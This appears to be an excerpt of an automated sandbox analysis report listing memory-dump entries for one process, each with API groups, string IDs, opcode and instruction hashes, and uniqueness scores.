Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
• Instruction ID: 87c04f276bf234bb12083d871c6ed8e9f08ee61aa6c46c42272f5164b1e321f2
• Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
• Instruction Fuzzy Hash: CD11B63D716B40C2E7908B12E88931972A4F78DFE4F04C224EA6D877A6CF78C458CB40
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Heap$Process$AllocFree
• String ID: dialer
• API String ID: 756756679-3528709123
• Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
• Instruction ID: 39afe3ddd6e6d097b45cd4de5d81cf374d4bc5a978f8d31865c8414a9fdac7dd
• Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
• Instruction Fuzzy Hash: 6C31812A703B5582EB95DF17A58A76967A0FB48F84F08C120EE5D4BB57EF34C4A9C700
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
• Instruction ID: 5266cd08fac6005184ef1348c82c0eaa1e8f4704349bffd67690afbb6ad547b5
• Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
• Instruction Fuzzy Hash: 01115C2C20324482FBE8A73155DF32962426B8CFF4F54C724F87E5E6E7DE6884098700
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
• Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
• Instruction ID: 29e0ebf9dfd58fbeb2982f728eac6f33a9a06f10bc25bb9a1a85be3c82a0978c
• Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
• Instruction Fuzzy Hash: 67015B29702A4082EB90DB52E49935963A1F78DFC0F48C035DEAE43766DE7CC58ECB00
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
• Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
• Instruction ID: 620cabbc7c02fe0baf70140da816195882e94c90b305abdd921547fc3a1f19ba
• Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
• Instruction Fuzzy Hash: 3B011B6D617B40C2EBA49B22E88E71572A0BB4DFC6F04C425D96D07766EF7DC14C8B00
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
• Instruction ID: cab1018f037914e8374d0607161d5a41f4c1305bd99ef49bf0057c0f5e905668
• Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
• Instruction Fuzzy Hash: F651B13A7066008AEB94CF15E88DB693796F348FC8F51C524EB6A4B74ADF75C94AC700
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
• Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
• Instruction ID: 77bf96414c871147b412229e64955f9692535b18de8a8e4c6af6d15e64c58984
• Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
• Instruction Fuzzy Hash: EFF0AF6A305680D2EBA09B21F8C93596360F74DFC8F94C020DAAD4A966DF7CC68DCB00
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
• Instruction ID: da78497f32208a10e606192a29494fc326e245c6655d93fbe275253205ff8263
• Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
• Instruction Fuzzy Hash: A3F0626D213605C2EB508B24E8CE3596321EB8EFA1F54C219DA7E492F6DF6CC48D8700
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
• Instruction ID: fe481a6a832e91e1b0a972e284cfd228bfdc39b99d3a405373212e3135b22ae7
• Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
• Instruction Fuzzy Hash: 7DF05E6C606B84C2EB809B13B9891196260AB4DFC0F08C120EE6E07B2ADF6CC4898B00
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
• Instruction ID: e876196aa6d2855d9486036f54fd059ebd800e97bb5603dcdf946595053b7c85
• Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
• Instruction Fuzzy Hash: 6F61AB3A61AA44C6E7A0CB15E48931A77B0F388B94F51D116FADE47BA9DF7CC448CB00
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
• Instruction ID: 9df09107c09c3dbcb0a4f5d01aad4cda4688fd256b6f3375119177dd15073b35
• Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
• Instruction Fuzzy Hash: 4211983EA15A5092F7E41558D5EF36511406B6FBB4F08C624E77E267D78EA8C4CE4700
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                                      • Instruction ID: 0b9e66c092d5353bd90ac7823ab4196f3369b9b2a0ece46c9412d5aad13bc16c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8061693B612B848AEB60DF65D48539D77A0F348B88F048215EF6D1BB9ADF78C599C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                                      • Instruction ID: aecec427920cf964f2c500dee6c23b4f90442e7d901555835a7b87036198dd57
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11519E7B122780CAEBB48B1594CA35977A0F358F85F14C116FAAD4BB96CF38D4A8C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                                                                      • Instruction ID: dc3952f9b1b36ae91d7bf0c8d025bc04fe7a2e0d4c3bd89bf2b147d8f58767b3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0ED1123A706A80C9E755CF6AD48539C3BB1F34AB98F00C216DE6D97B9ADE74C44AC740
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$Process$Free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3168794593-0
                                                                                                                                                                                                      • Opcode ID: 67b040d7ee802606bd56d07f6ed8f9806d413318a069c895cd09d0520baf0e98
                                                                                                                                                                                                      • Instruction ID: 0de66cf9629e314cb73f369278df029e6b34802edab9867acc8c101c11f046c1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67b040d7ee802606bd56d07f6ed8f9806d413318a069c895cd09d0520baf0e98
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8611903EA06A90CAE790DB62D88924967A0F74EFC0F04C025DB6D43727DE38C0998B00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                                                      • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                                                                      • Instruction ID: c0e4e2bb94459c3927f15c6b93068607d186b0e1c8a0db24b365ca452b44f6ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E891D67E702A50C5F7989F7694CA3AD2BA0B70AF88F14C105DE2E57696DEB4C4CAC700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileType
                                                                                                                                                                                                      • String ID: \\.\pipe\
                                                                                                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                                                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                                                                      • Instruction ID: 2045c51461cb6e3c4e330e0400f06f28497d849f0a3ece22e2d95f09a3f1f34d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E71B63A2027C186E7A49E2798C93A96794F38DF84F54C015FD2E5BB8BDE35C649C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileType
                                                                                                                                                                                                      • String ID: \\.\pipe\
                                                                                                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                                                                                                      • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                                                                      • Instruction ID: 114f22edd4db67974f88229144f196d39074de81b4497283f5c74c689a9761f4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B651C73A2067C181F7A4DA2AA4ED36AA791F38DF40F44C115EE6E07B5BDE39C50C8750
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                                                      • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                                                                      • Instruction ID: 0e61806694ce1a69e6e7b965a6c91b5facd84c07cbea90de033002916ccf1ea9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA41A23A216A80C6DBA0DF26E4893AA77A0F79DB94F40C021EE5D87795EF7CC449C740
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                                                      • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
• Instruction ID: d2d45102f6022ad079f417c59ce483d6dfe33ceadc998bce2d81460228beb5a2
• Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
• Instruction Fuzzy Hash: AE112B3A216B8082EBA18B15E48435977E5F788F94F59C220EF9C0B769DF3CC555CB00
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction ID: 586a83de353d49db31800be4fb894c08c871f1434d6ff2b5443c07a6e9e5de38
• Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction Fuzzy Hash: 80114F29A03B4481EB94DB66A88A22977A1FB8DFC0F18C025DE9D57766DE78C446D700
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction ID: a77cece094574aa69811fd8dadb047c79e938b3ddca75d249d5009af6d125fe3
• Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction Fuzzy Hash: 55E03939A03604C6EB44AB62D84934A36E1EB8EF86F04C024C91907362DFBD84DACF50
Uniqueness
Uniqueness Score: -1.00%